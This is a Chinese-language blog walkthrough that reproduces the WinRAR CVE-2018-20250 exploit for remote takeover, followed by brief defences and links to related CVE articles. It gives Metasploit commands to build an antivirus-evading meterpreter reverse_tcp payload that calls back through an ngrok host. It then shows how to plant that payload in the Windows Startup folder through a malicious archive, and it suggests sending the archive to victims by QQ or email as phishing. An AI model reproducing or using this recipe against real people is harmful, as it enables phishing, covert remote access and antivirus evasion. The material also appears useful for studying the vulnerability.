CVE-2018-20250 -- WinRAR远程代码执行漏洞结合Metasploit+Ngrok实现远程上线

0x0 引言

Windows 操作系统下知名老牌的的压缩软件“WinRAR” 被国外安全研究团队爆出严重威胁用户的安全漏洞，被发现漏洞是“WinRAR”安装目录中的一个名为“UNACEV2.dll”的动态链接库文件，该文件自 2005 年发布至今就从未有过更新过，影响时长长达十余年之久

实验介绍
利用cve-2018-20250结合ngrok（公网安装的msf无须ngrok），穿透内网

实验环境

漏洞环境
WinRAR < 5.70 Beta 1 （5.6 测试成功）

注：推荐使用WinRAR，不然打开时有可能出现以下情况

靶机系统：win7 64位旗舰版
ip:192.168.232.138

攻击方：kali 任意版本即可
msf5
ngrok
ip:192.168.232.134

exp： https://github.com/WyAtu/CVE-2018-20250.git

0x1 复现步骤

1.测试网络

网络畅通

2 配置ngrok

打开ngrok，没有账户注册登录。开通一个免费的隧道转发代理，把ngrok隧道协议设置成TCP，内网IP改成你自己的KaliLinux的内网IP，内网端口号任意填写不冲突即可。

传送门：https://www.ngrok.cc

3. 然后下载ngrok脚本把脚本放到你的KaliLinux上面，我们选择”Linux 64Bit版本”下载即可，接着运行脚本开启代理。

往虚拟机拖放文件需要安装VMware tools ，具体安装教程可以参考我以前的帖子
传送门:https://blog.csdn.net/chest_/article/details/100009058

./sunny clientid [隧道ID]

./就是当前目录，我们找到刚刚拖进来的文件，然后输入上面命令运行即可

隧道id去隧道管理处查看即可

4.使用msf生成payload

msfconsoleuse evasion/windows/windows_defender_exe(选择msf5免杀模块)show info(显示模块信息)set filename WinRarPayloadTest.exe(设置Payload名字 )set payload windows/meterpreter/reverse_tcp(设置Payload类型 )set lhost free.idcfengye.com(设置上线地址，填写Ngrok映射出去的地址即可)set lport 12352(设置监听端口，填写Ngrok映射出去的端口即可 )run(生成Payload)

windows_defender.exe 模块为免杀模块，测试360，安全管家不报毒

方法1：payload生成后，我们使用mv 命令把它移动到桌面来，接着把该文件移动到物理机来，我这里拖不出来，应该是VMware tools 有点问题了，推荐使用方法二

方法2：把Payload移动到apache2网站根目录下，然后开启Apache2服务器，接着我们在物理机通过浏览器访问下载，也可把u盘作为中间件连接到虚拟机，然后把payload拷到物理机上
下载前建议先把杀软关闭

5.配置payload

打开exp.py文件把“calc.exe“修改成”hui.exe”保存,修改的参数具体看自己用msf生成时的文件名是什么

用 pycharm运行exp.py文件自动在文件根目录下生成恶意压缩包

kali 开启端口监听

在我们渗透测试的过程中，最常用的就是基于tcp/udp协议反弹一个shell，也就是反向连接。

我们先来讲一下什么是正向连接和反向连接。

正向连接：我们本机去连接目标机器，比如ssh和mstsc
反向连接：目标机器去连接我们本机
那么为什么反向连接会比较常用呢

目标机器处在局域网内，我们正向连不上他
目标机器是动态ip
目标机器存在防火墙

具体反弹流程：

tcp://free.idcfengye.com:10776 -> 192.168.232.134:3456

1.受害者加载恶意程序
2.恶意程序往刚刚设置好的地址，也就是使用Ngrok 进行转发
3.我们在Kali进行端口监听，这时候如果我们接收到了对应的监听信息，这时候我们就能获取对方的shell了

接着将生成的test.rar考到靶机上面（可以通过qq，邮件等方式发送给受害者，俗称钓鱼）
C:\Users\gao\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup 为win7开机自启目录，通过winrar解压生成test.rar文件，在自启目录生成可执行程序
当靶机重启系统，后门文件自动执行，并反弹shell

重启靶机,同时记得开启好代理隧道,不然会导致shell反弹失败！！

接着到Kali查看

成功拿到了shell，而且还是管理员权限，由此看来，这个漏洞不可忽视！！

防御措施

删除UNACEV2.dll文件
不下载解压来历不明的压缩包
尽快升级winrar最新版，或者卸载winrar软件
安装360等安全软件，经测试，当我对压缩包进行解压缩时，360会采取相对应的防御措施

参考资料

https://www.freebuf.com/articles/network/197025.html

CVE-2018-20250 -- WinRAR远程代码执行漏洞结合Metasploit+Ngrok实现远程上线相关推荐

Samba远程代码执行漏洞(CVE-2017-7494)复现
简要记录一下Samba远程代码执行漏洞(CVE-2017-7494)环境搭建和利用的过程,献给那些想自己动手搭建环境的朋友.(虽然已过多时) 快捷通道:Docker ~ Samba远程代码执行漏洞(C ...
php x24 x65 x6d x61,Jboss远程代码执行漏洞CVE:2013-4810获得system权限
此方法成功的渗透至Windows系统并获得最高权限exp 此方法成功的渗透至Windows系统并获得最高权限 exp ?php/*Apache Tomcat/JBoss EJBInvokerServl ...
绿盟安全事件响应观察及远程代码执行漏洞
人和管理成为主要入侵突破口安全需要人.技术.管理的全方位保障,然而人与管理由于其复杂性,常常成为入侵突破口.在 19 年处理的安全事件中,弱口令事件占比 22%,钓鱼邮件相关事件占比 7%,配置不 ...
微软远程桌面服务远程代码执行漏洞
人和管理成为主要入侵突破口安全需要人.技术.管理的全方位保障,然而人与管理由于其复杂性,常常成为入侵突破口.在 19 年处理的安全事件中,弱口令事件占比 22%,钓鱼邮件相关事件占比 7%,配置不当 ...
CVE-2018-8174 IE浏览器远程代码执行漏洞
0x00漏洞简介在2018年5月9日的时候360发表了一份apt攻击分析及溯源报告文中提到了cve-2018-8174这个漏洞的首次在apt方面的应用原文地址:http://www.4hou.c ...
绿盟科技网络安全威胁周报2017.17 请关注Squirrelmail 远程代码执行漏洞CVE-2017-7692...
绿盟科技发布了本周安全通告,周报编号NSFOCUS-17-17,绿盟科技漏洞库本周新增84条,其中高危40条.本次周报建议大家关注 Squirrelmail 远程代码执行漏洞 .SquirrelMai ...
cve-2017-12617 tomcat远程代码执行漏洞复现测试
0x00前情提要 Apache Tomcat团队10月3日宣布,如果配置了默认servlet,则在9.0.1(Beta),8.5.23,8.0.47和7.0.82之前的所有Tomcat版本都包含所有操 ...
wordpress 5.0.0 远程代码执行漏洞分析cve-2019-8943
近日,wordpress发布一个安全升级补丁,修复了一个WordPress核心中的远程代码执行漏洞.代码修改细节可以参考wordpress团队于Dec 13, 2018提交的代码.据漏洞披露者文中所介 ...
cve-2019-1821 思科 Cisco Prime 企业局域网管理器远程代码执行漏洞分析
前言不是所有目录遍历漏洞危害都相同,取决于遍历的用法以及用户交互程度.正如你将看到,本文的这个漏洞类在代码中非常难发现,但可以造成巨大的影响. 这个漏洞存在于思科Prime Infrastructu ...

CVE-2018-20250 -- WinRAR远程代码执行漏洞结合Metasploit+Ngrok实现远程上线

防御措施

CVE-2018-20250 -- WinRAR远程代码执行漏洞结合Metasploit+Ngrok实现远程上线相关推荐

最新文章

热门文章